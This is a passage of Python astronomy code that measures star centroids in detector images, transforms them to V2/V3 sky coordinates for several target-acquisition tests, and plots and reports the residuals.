HEADER:\", hdr)\n master_img = fits.getdata(star, 0)\n if verbose:\n print ('Master image shape: ', np.shape(master_img))\n # Obtain the combined FITS image that combines all frames into one image\n # background subtraction is done here\n psf = TAf.readimage(master_img, backgnd_subtraction_method, bg_method=background_method,\n bg_value=bg_value, bg_frac=bg_frac, verbose=verbose, debug=debug)\n cb_centroid_list_in32x32pix = TAf.run_recursive_centroids(psf, bg_frac, xwidth_list, ywidth_list,\n checkbox_size, max_iter, threshold,\n determine_moments, verbose, debug)\n\n corr_cb_centroid_list, loleftcoords, true_center32x32, differences_true_TA = TAf.centroid2fulldetector(cb_centroid_list_in32x32pix,\n true_center_fulldet, detector, perform_avgcorr=Pier_corr)\n if not output_full_detector:\n cb_centroid_list = cb_centroid_list_in32x32pix\n true_center = true_center32x32\n else:\n true_center = true_center_fulldet\n if show_centroids:\n print ('***** Measured centroids for centroid window sizes 3, 5, and 7, respectively:')\n print (' cb_centroid_list = ', corr_cb_centroid_list)\n print (' True center = ', true_center)\n\n # Show the display with the measured and true positions\n fig_name = os.path.join(\"../resultsXrandomstars\", \"centroid_displays/Star\"+repr(st)+\"_Scene\"+repr(scene)+bg_choice+pos+\".jpg\")\n # Display the combined FITS image that combines all frames into one image\n m_img = display_master_img\n if display_master_img:\n m_img = TAf.readimage(master_img, backgnd_subtraction_method=None, bg_method=None,\n bg_value=None, bg_frac=None, debug=False)\n TAf.display_centroids(detector, st, case, psf, true_center32x32, cb_centroid_list_in32x32pix,\n show_disp, vlim, savefile=save_centroid_disp, fig_name=fig_name, display_master_img=m_img)\n if pos == \"_Position2\":\n true_center_fulldetP2 = [bench_xP2[idx_star], bench_yP2[idx_star]]\n _, _, true_center32x32P2, _ = TAf.centroid2fulldetector(cb_centroid_list_in32x32pix,\n true_center_fulldetP2, detector, perform_avgcorr=Pier_corr)\n #print ('true_center32x32 P1:', true_center32x32)\n #print ('true_center32x32 P2:', true_center32x32P2)\n # the following correction is because the postage stamp is centered on position 1 even if the\n # the star moved to position 2.\n if st <= 100:\n true_center32x32P2[0] = true_center32x32P2[0]+1.0\n true_center32x32P2[1] = true_center32x32P2[1]+2.0\n else:\n true_center32x32P2[0] = true_center32x32P2[0]-1.0\n true_center32x32P2[1] = true_center32x32P2[1]-2.0\n #print ('true_center32x32 P2:', true_center32x32P2)\n #print ('cb_centroid_list_in32x32pix:')\n #print (cb_centroid_list_in32x32pix)\n TAf.display_centroids(detector, st, case, psf, true_center32x32P2, cb_centroid_list_in32x32pix,\n show_disp, vlim, savefile=save_centroid_disp, fig_name=fig_name, display_master_img=m_img)\n # Find the best centroid window size = minimum difference with true values\n min_diff, _ = TAf.get_mindiff(differences_true_TA[0][0], differences_true_TA[0][1], differences_true_TA[0][2])\n # Save output\n true_centerX.append(true_center[0])\n true_centerY.append(true_center[1])\n loleftcoords_listX.append(loleftcoords[0])\n loleftcoords_listY.append(loleftcoords[1])\n mag_list.append(mag_i)\n min_diff_pixposX.append(min_diff[0])\n min_diff_pixposY.append(min_diff[1])\n if pos == \"_Position1\":\n x13 = np.append(x13, corr_cb_centroid_list[0][0])\n x15 = np.append(x15, corr_cb_centroid_list[1][0])\n x17 = np.append(x17, corr_cb_centroid_list[2][0])\n y13 = np.append(y13, corr_cb_centroid_list[0][1])\n y15 = np.append(y15, corr_cb_centroid_list[1][1])\n y17 = np.append(y17, corr_cb_centroid_list[2][1])\n if pos == \"_Position2\":\n x23 = np.append(x23, corr_cb_centroid_list[0][0])\n x25 = np.append(x25, corr_cb_centroid_list[1][0])\n x27 = np.append(x27, corr_cb_centroid_list[2][0])\n y23 = np.append(y23, corr_cb_centroid_list[0][1])\n y25 = np.append(y25, corr_cb_centroid_list[1][1])\n y27 = np.append(y27, corr_cb_centroid_list[2][1])\n # Write output into text file\n position = \"_Position1\"\n x_pixpos = [x13, x15, x17]\n y_pixpos = [y13, y15, y17]\n if pos == \"_Position2\":\n x_pixpos = [x23, x25, x27]\n y_pixpos = [y23, y25, y27]\n position = \"_Position2\"\n true_centers = [true_centerX, true_centerY]\n loleftcoords_list = [loleftcoords_listX, loleftcoords_listY]\n output_file = os.path.join(output_file_path, \"centroids_Scene\"+repr(scene)+bg_choice+position+\".txt\")\n data2write = [x_pixpos, y_pixpos, true_centers, loleftcoords_list, mag_list, min_diff_pixposX, min_diff_pixposY]\n TAf.writePixPos(save_text_file, show_centroids, output_file, lines4screenandfile, stars_sample, background2use, data2write)\n\n if debug:\n print (\"Check that read BENCHMARK values correspond to expected for case: \", case)\n print (\"Star, xP1, yP1, V2P1, V3P1, xLP1, yLP1\")\n print (bench_starP1[0], bench_xP1[0], bench_yP1[0], bench_V2P1[0], bench_V3P1[0], bench_xLP1[0], bench_yLP1[0])\n print (\"Star, xP2, yP2, V2P2, V3P2, xLP2, yLP2\")\n print (bench_starP2[0], bench_xP2[0], bench_yP2[0], bench_V2P2[0], bench_V3P2[0], bench_xLP2[0], bench_yLP2[0])\n print (\"Check that read MEASURED values correspond to expected for the same case: \", case)\n print (\" -> reading measured info from: \", case)\n print (\"Star, BG, x13, y13, x15, y15, x17, y17, LoLeftP1 (x, y), TrueP1 (x, y)\")\n print (stars_sample[0], bg_choice, x13[0], y13[0], x15[0], y15[0], x17[0], y17[0], bench_xLP1[0], bench_yLP1[0], bench_xP1[0], bench_yP1[0])\n print (\"Star, BG, x23, y23, x25, y25, x27, y27, LoLeftP2 (x, y), TrueP2 (x, y)\")\n print (stars_sample[0], bg_choice, x23[0], y23[0], x25[0], y25[0], x27[0], y27[0], bench_xLP2[0], bench_yLP2[0], bench_xP2[0], bench_yP2[0])\n raw_input(\" * press enter to continue... \\n\")\n\n # show positions on screen\n line0 = \"\\n Centroid indexing starting at 1 !\"\n line0a = \"{:<5} {:<15} {:<16} {:>23} {:>30} {:>44} {:>17} {:>15}\".format(\"Star\", \"Background\",\n \"Centroid windows: 3\", \"5\", \"7\",\n \"TruePositions\", \"LoLeftCoords\",\n \"Mag\")\n line0b = \"{:>25} {:>12} {:>16} {:>14} {:>16} {:>14} {:>16} {:>18} {:>12} {:>10}\".format(\n \"x\", \"y\", \"x\", \"y\", \"x\", \"y\",\n \"TrueX\", \"TrueY\", \"LoLeftX\", \"LoLeftY\")\n print (\"Analyzing case: \", case)\n print (line0)\n print (line0a)\n print (line0b)\n for i, st in enumerate(stars_sample):\n line1 = \"{:<5} {:<10} {:<14} {:<16} {:<14} {:<16} {:<14} {:<16} {:<14} {:<16} {:<8} {:<12} {:<10.2f}\".format(\n int(st), background2use,\n x13[i], y13[i], x15[i], y15[i], x17[i], y17[i],\n bench_xP1[i]-bench_xLP1[i], bench_yP1[i]-bench_yLP1[i],\n bench_xLP1[i], bench_yLP1[i],\n magnitudes[i])\n print (line1)\n\n # compact results for functions\n P1P2data = [x13,y13, x23,y23, x15,y15, x25,y25, x17,y17, x27,y27]\n\n #plot_pixpos = True\n if plot_pixpos:\n # plot of sample residual x and y for positions 1 and 2\n fig1 = plt.figure(1, figsize=(12, 10))\n ax1 = fig1.add_subplot(111)\n #plt.suptitle(plot_title, fontsize=18, y=0.96)\n plt.title(case)\n plt.xlabel('X Residuals [Pixels]')\n plt.ylabel('Y Residuals [Pixels]')\n arrx, arry = x17-bench_xP1, y17-bench_yP1\n xP1 = [min(arrx)+min(arrx)*0.5, max(arrx)+max(arrx)*0.5]\n yP1 = [min(arry)+min(arry)*0.5, max(arry)+max(arry)*0.5]\n arrx, arry = x27-bench_xP2, y27-bench_yP2\n xP2 = [min(arrx)+min(arrx)*0.5, max(arrx)+max(arrx)*0.5]\n yP2 = [min(arry)+min(arry)*0.5, max(arry)+max(arry)*0.5]\n # determine qhich limit is larger in P1\n if xP1[1] > yP1[1]:\n larP1 = xP1[1]\n else:\n larP1 = yP1[1]\n if xP2[1] > yP2[1]:\n larP2 = xP2[1]\n else:\n larP2 = yP2[1]\n if larP1 > larP2:\n uplim = larP1\n lolim = -1 * larP1\n else:\n uplim = larP2\n lolim = -1 * larP2\n plt.xlim(lolim, uplim)\n plt.ylim(lolim, uplim)\n plt.hlines(0.0, lolim, uplim, colors='k', linestyles='dashed')\n plt.vlines(0.0, lolim, uplim, colors='k', linestyles='dashed')\n # plot measured positions\n plt.plot(x13-bench_xP1, y13-bench_yP1, 'b^', ms=10, alpha=0.5, label='CentroidWindow3_P1')\n plt.plot(x15-bench_xP1, y15-bench_yP1, 'go', ms=10, alpha=0.5, label='CentroidWindow5_P1')\n plt.plot(x17-bench_xP1, y17-bench_yP1, 'r*', ms=13, alpha=0.5, label='CentroidWindow7_P1')\n plt.plot(x23-bench_xP2, y23-bench_yP2, 'c^', ms=10, alpha=0.5, label='CentroidWindow3_P2')\n plt.plot(x25-bench_xP2, y25-bench_yP2, 'yo', ms=10, alpha=0.5, label='CentroidWindow5_P2')\n plt.plot(x27-bench_xP2, y27-bench_yP2, 'm*', ms=13, alpha=0.5, label='CentroidWindow7_P2')\n # Shrink current axis by 20%\n box = ax1.get_position()\n ax1.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax1.legend(loc='center left', bbox_to_anchor=(1, 0.5)) # put legend out of the plot box\n y_reject = [-1.0, 1.0]\n x_reject = [-1.0, 1.0]\n for si, xi, yi in zip(stars_sample, x13-bench_xP1, y13-bench_yP1):\n #if yi >= y_reject[1] or yi <= y_reject[0] or xi >= x_reject[1] or xi <= x_reject[0]:\n si = int(si)\n subxcoord = 5\n subycoord = 0\n side = 'left'\n plt.annotate('{}'.format(si), xy=(xi,yi), xytext=(subxcoord, subycoord), ha=side, textcoords='offset points')\n for si, xi, yi in zip(stars_sample, x23-bench_xP2, y23-bench_yP2):\n #if yi >= y_reject[1] or yi <= y_reject[0] or xi >= x_reject[1] or xi <= x_reject[0]:\n si = int(si)\n subxcoord = 5\n subycoord = 0\n side = 'left'\n plt.annotate('{}'.format(si), xy=(xi,yi), xytext=(subxcoord, subycoord), ha=side, textcoords='offset points')\n plt.show()\n return bg_choice, P1P2data, bench_starP1, benchmark_V2V3_sampleP1P2\n\n\ndef transformAndRunTest(stars_sample, path4results, primary_params, secondary_params,\n bg_choice, P1P2data, bench_starP1, benchmark_V2V3_sampleP1P2, plot_v2v3pos=True,\n extra_string=None):\n '''\n This function converts to sky for the X random star sample, and performs the given test.\n\n Args:\n primary_params: list, set of parameters specific to the case\n secondary_params: list, set of generic parameters\n bg_choice: string of the background method used\n P1P2data: list of pixel positions for centroid windows 3, 5, and 7 for both positions,\n P1P2data = [x13,y13, x23,y23, x15,y15, x25,y25, x17,y17, x27,y27]\n bench_starP1: list of the benchmark stars studied\n benchmark_V2V3_sampleP1P2: list of benchmark V2s and V3s,\n benchmark_V2V3_sampleP1P2 = [bench_V2P1, bench_V3P1, bench_V2P2, bench_V3P2]\n\n Returns:\n case = string, string, for example 'Scene2_rapid_real_bgFrac'\n Tbench_Vs_list = list of benchmark V2 and V3s\n T_Vs = list of measured V2 and V3s\n T_diffVs = list of true-measured V2s and V3s\n LS_res = list, std deviations and means from least squared routine\n '''\n\n # unfold variables\n primary_params1, primary_params2, primary_params3 = primary_params\n do_plots, save_plots, show_plots, detector, output_full_detector, show_onscreen_results, show_pixpos_and_v23_plots, save_text_file = primary_params1\n save_centroid_disp, keep_bad_stars, keep_ugly_stars, just_least_sqares, stars_in_sample, scene, background_method, background2use = primary_params2\n shutters, noise, filter_input, test2perform, Nsigma, abs_threshold, abs_threshold, min_elements, max_iters_Nsig = primary_params3\n secondary_params1, secondary_params2, secondary_params3 = secondary_params\n checkbox_size, xwidth_list, ywidth_list, vlim, threshold, max_iter, verbose = secondary_params1\n debug, arcsecs, determine_moments, display_master_img, show_centroids, show_disp = secondary_params2\n Pier_corr, tilt, backgnd_subtraction_method, random_sample = secondary_params3\n bench_V2P1, bench_V3P1, bench_V2P2, bench_V3P2 = benchmark_V2V3_sampleP1P2\n trueVsP1 = [bench_V2P1, bench_V3P1]\n trueVsP2 = [bench_V2P2, bench_V3P2]\n\n # transform into sky coordinates\n #case2study = [scene, shutters, noise, bg_choice]\n if type(detector) is not str:\n det = repr(detector)\n else:\n det = '2Dets'\n case = det+\"Scene\"+str(scene)+\"_\"+shutters+\"_\"+noise+bg_choice+repr(background2use)+'_Nsigma'+repr(Nsigma)\n if extra_string is not None:\n case += extra_string\n\n # Now run the tests\n transf_direction = \"forward\"\n detectors = [491, 492]\n # TEST 1: (a) Avg P1 and P2, (b) transform to V2-V3, (c) compare to avg reference positions (V2-V3 space)\n if test2perform == \"T1\":\n resultsTEST1 = TAf.runTEST(test2perform, detectors, transf_direction, case, stars_sample, P1P2data, bench_starP1,\n trueVsP1, trueVsP2, filter_input, tilt, arcsecs, debug)\n T1P1P2data, T1_transformations, T1_diffs, T1_benchVs_list = resultsTEST1\n T1_V2_3, T1_V3_3, T1_V2_5, T1_V3_5, T1_V2_7, T1_V3_7 = T1_transformations\n T1_diffV2_3, T1_diffV3_3, T1_diffV2_5, T1_diffV3_5, T1_diffV2_7, T1_diffV3_7 = T1_diffs\n T1bench_V2_list, T1bench_V3_list = T1_benchVs_list\n # Get the statistics\n results_stats = TAf.get_stats(T1_transformations, T1_diffs, T1_benchVs_list, Nsigma, max_iters_Nsig,\n arcsecs, just_least_sqares, abs_threshold, min_elements)\n # unfold results\n T1_st_devsAndMeans, T1_diff_counter, T1_bench_values, T1_sigmas_deltas, T1_sigma_reject, rejected_elementsLS, rejected_eleNsig, iterations = results_stats\n T1stdev_V2_3, T1mean_V2_3, T1stdev_V2_5, T1mean_V2_5, T1stdev_V2_7, T1mean_V2_7, T1stdev_V3_3, T1mean_V3_3, T1stdev_V3_5, T1mean_V3_5, T1stdev_V3_7, T1mean_V3_7 = T1_st_devsAndMeans\n T1_min_diff, T1_counter = T1_diff_counter\n T1LSdeltas_3, T1LSsigmas_3, T1LSlines2print_3, T1LSdeltas_5, T1LSsigmas_5, T1LSlines2print_5, T1LSdeltas_7, T1LSsigmas_7, T1LSlines2print_7 = T1_sigmas_deltas\n T1sigmaV2_3, T1meanV2_3, T1sigmaV3_3, T1meanV3_3, T1newV2_3, T1newV3_3, T1niter_3, T1lines2print_3, T1sigmaV2_5, T1meanV2_5, T1sigmaV3_5, T1meanV3_5, T1newV2_5, T1newV3_5, T1niter_5, T1lines2print_5, T1sigmaV2_7, T1meanV2_7, T1sigmaV3_7, T1meanV3_7, T1newV2_7, T1newV3_7, T1niter_7, T1lines2print_7 = T1_sigma_reject\n\n # TEST 2: (a) Transform individual P1 and P2 to V2-V3, (b) avg V2-V3 space positions, (c) compare to avg reference positions\n if test2perform == \"T2\":\n resultsTEST2 = TAf.runTEST(test2perform, detectors, transf_direction, case, stars_sample, P1P2data, bench_starP1,\n trueVsP1, trueVsP2, filter_input, tilt, arcsecs, debug)\n T2P1P2data, T2_transformations, T2_diffs, T2_benchVs_list = resultsTEST2\n T2_V2_3, T2_V3_3, T2_V2_5, T2_V3_5, T2_V2_7, T2_V3_7 = T2_transformations\n T2_diffV2_3, T2_diffV3_3, T2_diffV2_5, T2_diffV3_5, T2_diffV2_7, T2_diffV3_7 = T2_diffs\n T2bench_V2_list, T2bench_V3_list = T2_benchVs_list\n # Get the statistics\n results_stats = TAf.get_stats(T2_transformations, T2_diffs, T2_benchVs_list, Nsigma, max_iters_Nsig,\n arcsecs, just_least_sqares, abs_threshold, min_elements)\n # unfold results\n T2_st_devsAndMeans, T2_diff_counter, T2_bench_values, T2_sigmas_deltas, T2_sigma_reject, rejected_elementsLS, rejected_eleNsig, iterations = results_stats\n T2stdev_V2_3, T2mean_V2_3, T2stdev_V2_5, T2mean_V2_5, T2stdev_V2_7, T2mean_V2_7, T2stdev_V3_3, T2mean_V3_3, T2stdev_V3_5, T2mean_V3_5, T2stdev_V3_7, T2mean_V3_7 = T2_st_devsAndMeans\n T2_min_diff, T2_counter = T2_diff_counter\n T2LSdeltas_3, T2LSsigmas_3, T2LSlines2print_3, T2LSdeltas_5, T2LSsigmas_5, T2LSlines2print_5, T2LSdeltas_7, T2LSsigmas_7, T2LSlines2print_7 = T2_sigmas_deltas\n T2sigmaV2_3, T2meanV2_3, T2sigmaV3_3, T2meanV3_3, T2newV2_3, T2newV3_3, T2niter_3, T2lines2print_3, T2sigmaV2_5, T2meanV2_5, T2sigmaV3_5, T2meanV3_5, T2newV2_5, T2newV3_5, T2niter_5, T2lines2print_5, T2sigmaV2_7, T2meanV2_7, T2sigmaV3_7, T2meanV3_7, T2newV2_7, T2newV3_7, T2niter_7, T2lines2print_7 = T2_sigma_reject\n\n # TEST 3: (a) Transform P1 and P2 individually to V2-V3 (b) compare star by star and position by position\n if test2perform == \"T3\":\n resultsTEST3 = TAf.runTEST(test2perform, detectors, transf_direction, case, stars_sample, P1P2data, bench_starP1,\n trueVsP1, trueVsP2, filter_input, tilt, arcsecs, debug)\n T3P1P2data, T3_transformations, T3_diffs, T3_benchVs_list = resultsTEST3\n x13,y13, x23,y23, x15,y15, x25,y25, x17,y17, x27,y27 = T3P1P2data\n T_V2_3, T_V3_3, T_V2_5, T_V3_5, T_V2_7, T_V3_7 = T3_transformations\n T3_V2_13, T3_V2_23 = T_V2_3\n T3_V3_13, T3_V3_23 = T_V3_3\n T3_V2_15, T3_V2_25 = T_V2_5\n T3_V3_15, T3_V3_25 = T_V3_5\n T3_V2_17, T3_V2_27 = T_V2_7\n T3_V3_17, T3_V3_27 = T_V3_7\n T_diffV2_3, T_diffV3_3, T_diffV2_5, T_diffV3_5, T_diffV2_7, T_diffV3_7 = T3_diffs\n T3_diffV2_13, T3_diffV2_23 = T_diffV2_3\n T3_diffV3_13, T3_diffV3_23 = T_diffV3_3\n T3_diffV2_15, T3_diffV2_25 = T_diffV2_5\n T3_diffV3_15, T3_diffV3_25 = T_diffV3_5\n T3_diffV2_17, T3_diffV2_27 = T_diffV2_7\n T3_diffV3_17, T3_diffV3_27 = T_diffV3_7\n T3bench_V2_list, T3bench_V3_list = T3_benchVs_list\n T3bench_V2_listP1, T3bench_V2_listP2 = T3bench_V2_list\n T3bench_V3_listP1, T3bench_V3_listP2 = T3bench_V3_list\n # combine the arrays (positions 1 and 2)\n T3_V2_3, T3_V2_5, T3_V2_7 = np.array([]), np.array([]), np.array([])\n T3_V2_3 = TAf.combine2arrays(T3_V2_13, T3_V2_23, T3_V2_3)\n T3_V2_5 = TAf.combine2arrays(T3_V2_15, T3_V2_25, T3_V2_5)\n T3_V2_7 = TAf.combine2arrays(T3_V2_17, T3_V2_27, T3_V2_7)\n T3_V3_3, T3_V3_5, T3_V3_7 = np.array([]), np.array([]), np.array([])\n T3_V3_3 = TAf.combine2arrays(T3_V3_13, T3_V3_23, T3_V3_3)\n T3_V3_5 = TAf.combine2arrays(T3_V3_15, T3_V3_25, T3_V3_5)\n T3_V3_7 = TAf.combine2arrays(T3_V3_17, T3_V3_27, T3_V3_7)\n T3_diffV2_3, T3_diffV2_5, T3_diffV2_7 = np.array([]), np.array([]), np.array([])\n T3_diffV2_3 = TAf.combine2arrays(T3_diffV2_13, T3_diffV2_23, T3_diffV2_3)\n T3_diffV2_5 = TAf.combine2arrays(T3_diffV2_15, T3_diffV2_25, T3_diffV2_5)\n T3_diffV2_7 = TAf.combine2arrays(T3_diffV2_17, T3_diffV2_27, T3_diffV2_7)\n T3_diffV3_3, T3_diffV3_5, T3_diffV3_7 = np.array([]), np.array([]), np.array([])\n T3_diffV3_3 = TAf.combine2arrays(T3_diffV3_13, T3_diffV3_23, T3_diffV3_3)\n T3_diffV3_5 = TAf.combine2arrays(T3_diffV3_15, T3_diffV3_25, T3_diffV3_5)\n T3_diffV3_7 = TAf.combine2arrays(T3_diffV3_17, T3_diffV3_27, T3_diffV3_7)\n T3bench_V2_list, T3bench_V3_list = np.array([]), np.array([])\n T3bench_V2_list = TAf.combine2arrays(np.array(T3bench_V2_listP1), np.array(T3bench_V2_listP2), T3bench_V2_list)\n T3bench_V3_list = TAf.combine2arrays(np.array(T3bench_V3_listP1), np.array(T3bench_V3_listP2), T3bench_V3_list)\n T3bench_V2_list.tolist()\n T3bench_V3_list.tolist()\n # Get the statistics\n T3_transformations = [T3_V2_3, T3_V3_3, T3_V2_5, T3_V3_5, T3_V2_7, T3_V3_7]\n T3_diffs = [T3_diffV2_3, T3_diffV3_3, T3_diffV2_5, T3_diffV3_5, T3_diffV2_7, T3_diffV3_7]\n T3_benchVs_list = [T3bench_V2_list, T3bench_V3_list]\n results_stats = TAf.get_stats(T3_transformations, T3_diffs, T3_benchVs_list, Nsigma, max_iters_Nsig,\n arcsecs, just_least_sqares, abs_threshold, min_elements)\n # unfold results\n T3_st_devsAndMeans, T3_diff_counter, T3_bench_values, T3_sigmas_deltas, T3_sigma_reject, rejected_elementsLS, rejected_eleNsig, iterations = results_stats\n T3stdev_V2_3, T3mean_V2_3, T3stdev_V2_5, T3mean_V2_5, T3stdev_V2_7, T3mean_V2_7, T3stdev_V3_3, T3mean_V3_3, T3stdev_V3_5, T3mean_V3_5, T3stdev_V3_7, T3mean_V3_7 = T3_st_devsAndMeans\n T3_min_diff, T3_counter = T3_diff_counter\n T3LSdeltas_3, T3LSsigmas_3, T3LSlines2print_3, T3LSdeltas_5, T3LSsigmas_5, T3LSlines2print_5, T3LSdeltas_7, T3LSsigmas_7, T3LSlines2print_7 = T3_sigmas_deltas\n T3sigmaV2_3, T3meanV2_3, T3sigmaV3_3, T3meanV3_3, T3newV2_3, T3newV3_3, T3niter_3, T3lines2print_3, T3sigmaV2_5, T3meanV2_5, T3sigmaV3_5, T3meanV3_5, T3newV2_5, T3newV3_5, T3niter_5, T3lines2print_5, T3sigmaV2_7, T3meanV2_7, T3sigmaV3_7, T3meanV3_7, T3newV2_7, T3newV3_7, T3niter_7, T3lines2print_7 = T3_sigma_reject\n\n #plot_v2v3pos = True\n if plot_v2v3pos:\n # plot of sample residual V2 and V3 for positions 1 and 2 for test 3\n fig1 = plt.figure(1, figsize=(12, 10))\n ax1 = fig1.add_subplot(111)\n #plt.suptitle(plot_title, fontsize=18, y=0.96)\n plt.title(case)\n plt.xlabel('V2 Residuals [arcsec]')\n plt.ylabel('V3 Residuals [arcsec]')\n #xlims = [-5.0, 5.0]\n #ylims = [-5.0, 5.0]\n #plt.xlim(xlims[0], xlims[1])\n #plt.ylim(ylims[0], ylims[1])\n #plt.hlines(0.0, xlims[0], xlims[1], colors='k', linestyles='dashed')\n #plt.vlines(0.0, ylims[0], ylims[1], colors='k', linestyles='dashed')\n arrx, arry = T3_diffV2_17, T3_diffV3_17\n xP1 = [min(arrx)+min(arrx)*0.5, max(arrx)+max(arrx)*0.5]\n yP1 = [min(arry)+min(arry)*0.5, max(arry)+max(arry)*0.5]\n arrx, arry = T3_diffV2_27, T3_diffV3_27\n xP2 = [min(arrx)+min(arrx)*0.5, max(arrx)+max(arrx)*0.5]\n yP2 = [min(arry)+min(arry)*0.5, max(arry)+max(arry)*0.5]\n # determine qhich limit is larger in P1\n if xP1[1] > yP1[1]:\n larP1 = xP1[1]\n else:\n larP1 = yP1[1]\n if xP2[1] > yP2[1]:\n larP2 = xP2[1]\n else:\n larP2 = yP2[1]\n if larP1 > larP2:\n uplim = larP1\n lolim = -1 * larP1\n else:\n uplim = larP2\n lolim = -1 * larP2\n plt.xlim(lolim, uplim)\n plt.ylim(lolim, uplim)\n plt.hlines(0.0, lolim, uplim, colors='k', linestyles='dashed')\n plt.vlines(0.0, lolim, uplim, colors='k', linestyles='dashed')\n # plot measured positions\n plt.plot(T3_diffV2_13, T3_diffV3_13, 'b^', ms=10, alpha=0.5, label='CentroidWindow3_P1')\n plt.plot(T3_diffV2_15, T3_diffV3_15, 'go', ms=10, alpha=0.5, label='CentroidWindow5_P1')\n plt.plot(T3_diffV2_17, T3_diffV3_17, 'r*', ms=13, alpha=0.5, label='CentroidWindow7_P1')\n plt.plot(T3_diffV2_23, T3_diffV3_23, 'c^', ms=10, alpha=0.5, label='CentroidWindow3_P2')\n plt.plot(T3_diffV2_25, T3_diffV3_25, 'yo', ms=10, alpha=0.5, label='CentroidWindow5_P2')\n plt.plot(T3_diffV2_27, T3_diffV3_27, 'm*', ms=13, alpha=0.5, label='CentroidWindow7_P2')\n # Shrink current axis by 20%\n box = ax1.get_position()\n ax1.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax1.legend(loc='center left', bbox_to_anchor=(1, 0.5)) # put legend out of the plot box\n x_reject, y_reject = [-1.0, 1.0], [-1.0, 1.0]\n for si, xi, yi in zip(stars_sample, T3_diffV2_13, T3_diffV3_13):\n #if yi >= y_reject[1] or yi <= y_reject[0] or xi >= x_reject[1] or xi <= x_reject[0]:\n si = int(si)\n subxcoord, subycoord = 5, 0\n side = 'left'\n plt.annotate('{}'.format(si), xy=(xi,yi), xytext=(subxcoord, subycoord), ha=side, textcoords='offset points')\n for si, xi, yi in zip(stars_sample, T3_diffV2_23, T3_diffV3_23):\n #if yi >= y_reject[1] or yi <= y_reject[0] or xi >= x_reject[1] or xi <= x_reject[0]:\n si = int(si)\n subxcoord, subycoord = 5, 0\n side = 'left'\n plt.annotate('{}'.format(si), xy=(xi,yi), xytext=(subxcoord, subycoord), ha=side, textcoords='offset points')\n plt.show()\n\n # Print results to screen and save into a text file if told so\n if test2perform == \"T1\":\n Tstdev_Vs = [T1stdev_V2_3, T1stdev_V3_3, T1stdev_V2_5, T1stdev_V3_5, T1stdev_V2_7, T1stdev_V3_7]\n Tmean_Vs = [T1mean_V2_3, T1mean_V3_3, T1mean_V2_5, T1mean_V3_5, T1mean_V2_7, T1mean_V3_7]\n T_diff_counter = [T1_min_diff, T1_counter]\n TLSlines2print = [T1LSlines2print_3, T1LSlines2print_5, T1LSlines2print_7]\n Tlines2print = [T1lines2print_3, T1lines2print_5, T1lines2print_7]\n Tbench_Vs_list = [T1bench_V2_list, T1bench_V3_list]\n T_Vs = [T1_V2_3, T1_V3_3, T1_V2_5, T1_V3_5, T1_V2_7, T1_V3_7]\n T_diffVs = [T1_diffV2_3, T1_diffV3_3, T1_diffV2_5, T1_diffV3_5, T1_diffV2_7, T1_diffV3_7]\n LS_res = [T1LSsigmas_3, T1LSsigmas_5, T1LSsigmas_7, T1LSdeltas_3, T1LSdeltas_5, T1LSdeltas_7]\n\n if test2perform == \"T2\":\n Tstdev_Vs = [T2stdev_V2_3, T2stdev_V3_3, T2stdev_V2_5, T2stdev_V3_5, T2stdev_V2_7, T2stdev_V3_7]\n Tmean_Vs = [T2mean_V2_3, T2mean_V3_3, T2mean_V2_5, T2mean_V3_5, T2mean_V2_7, T2mean_V3_7]\n T_diff_counter = [T2_min_diff, T2_counter]\n TLSlines2print = [T2LSlines2print_3, T2LSlines2print_5, T2LSlines2print_7]\n Tlines2print = [T2lines2print_3, T2lines2print_5, T2lines2print_7]\n Tbench_Vs_list = [T2bench_V2_list, T2bench_V3_list]\n T_Vs = [T2_V2_3, T2_V3_3, T2_V2_5, T2_V3_5, T2_V2_7, T2_V3_7]\n T_diffVs = [T2_diffV2_3, T2_diffV3_3, T2_diffV2_5, T2_diffV3_5, T2_diffV2_7, T2_diffV3_7]\n LS_res = [T2LSsigmas_3, T2LSsigmas_5, T2LSsigmas_7, T2LSdeltas_3, T2LSdeltas_5, T2LSdeltas_7]\n\n if test2perform == \"T3\":\n Tstdev_Vs = [T3stdev_V2_3, T3stdev_V3_3, T3stdev_V2_5, T3stdev_V3_5, T3stdev_V2_7, T3stdev_V3_7]\n Tmean_Vs = [T3mean_V2_3, T3mean_V3_3, T3mean_V2_5, T3mean_V3_5, T3mean_V2_7, T3mean_V3_7]\n T_diff_counter = [T3_min_diff, T3_counter]\n TLSlines2print = [T3LSlines2print_3, T3LSlines2print_5, T3LSlines2print_7]\n Tlines2print = [T3lines2print_3, T3lines2print_5, T3lines2print_7]\n Tbench_Vs_list = [T3bench_V2_list, T3bench_V3_list]\n T_Vs = [T3_V2_3, T3_V3_3, T3_V2_5, T3_V3_5, T3_V2_7, T3_V3_7]\n T_diffVs = [T3_diffV2_3, T3_diffV3_3, T3_diffV2_5, T3_diffV3_5, T3_diffV2_7, T3_diffV3_7]\n LS_res = [T3LSsigmas_3, T3LSsigmas_5, T3LSsigmas_7, T3LSdeltas_3, T3LSdeltas_5, T3LSdeltas_7]\n\n LS_info = [iterations, rejected_elementsLS]\n\n if show_onscreen_results or save_text_file:\n TAf.printTESTresults(stars_sample, case, test2perform, arcsecs, Tstdev_Vs, Tmean_Vs, T_diff_counter,\n save_text_file, TLSlines2print, Tlines2print, Tbench_Vs_list, T_Vs, T_diffVs,\n rejected_elementsLS, rejected_eleNsig, background_method, background2use, path4results)\n\n TV2_3, TV3_3, Tbench_V2_3, Tbench_V3_3 = rid_rejected_elements(rejected_elementsLS[0],\n T_Vs[0], T_Vs[1],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n TV2_5, TV3_5, Tbench_V2_5, Tbench_V3_5 = rid_rejected_elements(rejected_elementsLS[1],\n T_Vs[2], T_Vs[3],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n TV2_7, TV3_7, Tbench_V2_7, Tbench_V3_7 = rid_rejected_elements(rejected_elementsLS[2],\n T_Vs[4], T_Vs[5],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n TdiffV2_3, TdiffV3_3, _, _ = rid_rejected_elements(rejected_elementsLS[0],\n T_diffVs[0], T_diffVs[1],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n TdiffV2_5, TdiffV3_5, _, _ = rid_rejected_elements(rejected_elementsLS[1],\n T_diffVs[2], T_diffVs[3],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n TdiffV2_7, TdiffV3_7, _, _ = rid_rejected_elements(rejected_elementsLS[2],\n T_diffVs[4], T_diffVs[5],\n Tbench_Vs_list[0], 